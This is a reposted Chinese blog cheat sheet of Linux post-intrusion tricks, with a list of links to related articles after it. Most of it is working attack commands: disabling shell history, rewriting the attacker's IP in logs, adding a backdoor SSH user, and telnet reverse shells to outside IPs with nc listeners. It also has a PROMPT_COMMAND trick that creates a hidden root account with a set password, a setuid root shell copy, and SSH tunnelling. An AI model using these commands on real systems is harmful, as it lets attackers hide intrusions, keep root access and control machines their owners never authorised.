Linux入侵--some shit tips

简介:
  1,登录ssh之后不记录history
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
2. sed的一些邪恶用法
邪恶的替换到登录的IP和日志里的访问IP
sed -s ’s/211.xxx.xxx.xxx/192.168.1.1/g’ access_log access.log security
邪恶的添加ssh限制登录的用户
sed -i ’s/AllowUsers fuck root oracle/AllowUsers fuck root oracle rqcuser/g’ sshd_config
不过这个添加之后要强制重启sshd服务才可以生效
lsof -i:22 查找sshd的进程ID
COMMAND   PID USER   FD   TYPE   DEVICE SIZE NODE NAME
sshd    18662 root   11u IPv6 27925867       TCP *:ssh (LISTEN)
sshd    31793 sshd   12u IPv6 34742994       TCP 192.168.1.2:ssh->192.168.1.5:49080 (ESTABLISHED)
然后
kill -SIGHUP 18662
3.通过webshell反弹shell回来之后获取真正的ttyshell
python -c ‘import pty; pty.spawn(“/bin/sh”)’
另外一种获取ttyshell的方法
$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
bash sh.exp
4.通过TELNET进行反向连接:
telnet [attacker_ipaddr] [port1] | /bin/bash | telnet [attacker_ipaddr] [port2]
telnet 210.51.173.41 8080 | /bin/bash | telnet 210.51.173.41 8081
/usr/bin/telnet 203.93.28.236 8000|/bin/bash|/usr/bin/telnet 203.93.28.236 8001
在203.93.28.236上面运行:
nc –l –p 8000
nc –l –p 8001
/usr/bin/telnet 192.168.1.100 8088|/bin/bash|/usr/bin/telnet 192.168.1.100 8089
5.curl download
The full command should look something like this:
curl -C – -O http://www.mirror.com/path/to/NeoOffice-Patch.dmg
6.Windows下面NC监听linux返回shell执行命令不能正确换行的解决办法
unalias ls
7.linux的BASH提权
export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”
8.ssh tunnel
ssh -C -f -N -g -L listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host-f
9.本地rootshell

bash和tcsh是行不通的,其他的ash bsh zsh ksh均可。具体操作比较简单,大概说一下cp /bin/ksh . ; chown root.root ksh; chmod 4755 ksh,然后执行ksh就可以获得root权限了;这一招虽然看似低俗,但某些时候还是很有用的。所以一般情况下把多余的shell删除可以在一定程度上增加黑客入侵成本,没实施的同学可以考虑在标准化里面加入这个操作



















本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/354564,如需转载请自行联系原作者

相关文章
|
7月前
|
Linux 开发工具 C语言
编译Linux内核一定要知道的几个小Tips
编译Linux内核一定要知道的几个小Tips
|
10月前
|
运维 安全 网络协议
GScan - Linux安全入侵扫描工具
GScan - Linux安全入侵扫描工具
203 0
|
Linux Windows
Linux指令使用小tips
关于Linux指令使用的小tips
105 0
Linux指令使用小tips
|
安全 Java Linux
Linux服务器被入侵向外发包的处理解决方法
下面通过Sinesafe的客户一个案例介绍下当一个服务器被rootkit入侵后的处理思路和处理过程,rootkit攻击是Linux系统下最常见的攻击手段和攻击方式。
834 0
|
存储 运维 Linux
11个步骤完美排查Linux机器是否已经被入侵
随着开源产品的越来越盛行,作为一个Linux运维工程师,能够清晰地鉴别异常机器是否已经被入侵了显得至关重要,个人结合自己的工作经历,整理了几种常见的机器被黑情况供参考
1302 0
11个步骤完美排查Linux机器是否已经被入侵
|
NoSQL 安全 Linux
Linux系统被入侵后处理方式介绍
使用前一定先创建快照备份,否则不要执行脚本。 1、将ECS断开网络连接 使用ECS安全组单独对该ECS进行隔离;出方向禁止所有协议。入方向只允许运维的端口和指定IP进入,其他均禁止。
1826 0
|
网络协议 Linux
Linux 遭入侵,挖矿进程被隐藏排查记录
Linux 遭入侵,挖矿进程被隐藏排查记录 今天来给大家分享下这两天遇到的一个问题,服务器被挖矿了,把我的排查记录分享下,希望能帮到有需要的同学。 问题原因 多台服务器持续告警CPU过高,服务器为K8s的应用节点,正常情况下CPU使用率都挺低的,通过排查是原因是被挖矿了,下面为定位过程 定位过程 登陆问题主机10.
3189 0